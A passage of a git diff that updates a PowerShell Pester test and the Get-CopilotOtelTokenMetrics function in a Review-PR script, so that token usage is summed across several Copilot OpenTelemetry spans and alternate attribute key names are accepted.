'gen_ai.usage.reasoning.output_tokens' = 50 - 'github.copilot.cost' = 7.5 + @( + [ordered]@{ + type = 'span' + attributes = [ordered]@{ + 'gen_ai.usage.input_tokens' = 1000 + 'gen_ai.usage.output_tokens' = 200 + 'gen_ai.usage.cache_read.input_tokens' = 800 + 'gen_ai.usage.reasoning.output_tokens' = 50 + 'github.copilot.cost' = 7.5 + } + }, + [ordered]@{ + type = 'span' + attributes = [ordered]@{ + 'gen_ai.usage.input_tokens' = 500 + 'gen_ai.usage.output_tokens' = 40 + 'gen_ai.usage.cache_read_input_tokens' = 400 + 'gen_ai.usage.reasoning_output_tokens' = 10 + } } - } | ConvertTo-Json -Depth 10 -Compress | Set-Content $otelPath -Encoding UTF8 + ) | ForEach-Object { $_ | ConvertTo-Json -Depth 10 -Compress } | Set-Content $otelPath -Encoding UTF8 $metrics = Get-CopilotOtelTokenMetrics -Path $otelPath $metrics.available | Should -Be $true - $metrics.inputTokens | Should -Be 1000 - $metrics.outputTokens | Should -Be 200 - $metrics.cachedInputTokens | Should -Be 800 - $metrics.reasoningOutputTokens | Should -Be 50 - $metrics.totalTokens | Should -Be 1200 + $metrics.inputTokens | Should -Be 1500 + $metrics.outputTokens | Should -Be 240 + $metrics.cachedInputTokens | Should -Be 1200 + $metrics.reasoningOutputTokens | Should -Be 60 + $metrics.totalTokens | Should -Be 1740 $metrics.copilotCost | Should -Be 7.5 } finally { Remove-Item $otelPath -Force -ErrorAction SilentlyContinue diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 44632634ce58..4dcbbda429b3 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -846,8 +846,8 @@ function Get-CopilotOtelTokenMetrics { $attributes = $entry.attributes $inputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.input_tokens') $outputValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.output_tokens') - $cachedValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.cache_read.input_tokens') - 
$reasoningValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.reasoning.output_tokens') + $cachedValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.cache_read.input_tokens', 'gen_ai.usage.cache_read_input_tokens') + $reasoningValue = Get-ObjectMemberValue -InputObject $attributes -Names @('gen_ai.usage.reasoning.output_tokens', 'gen_ai.usage.reasoning_output_tokens') $costValue = Get-ObjectMemberValue -InputObject $attributes -Names @('github.copilot.cost') if (Test-IsNumericValue $inputValue) { $spanSums.input += [double]$inputValue; $spanSeen.input = $true }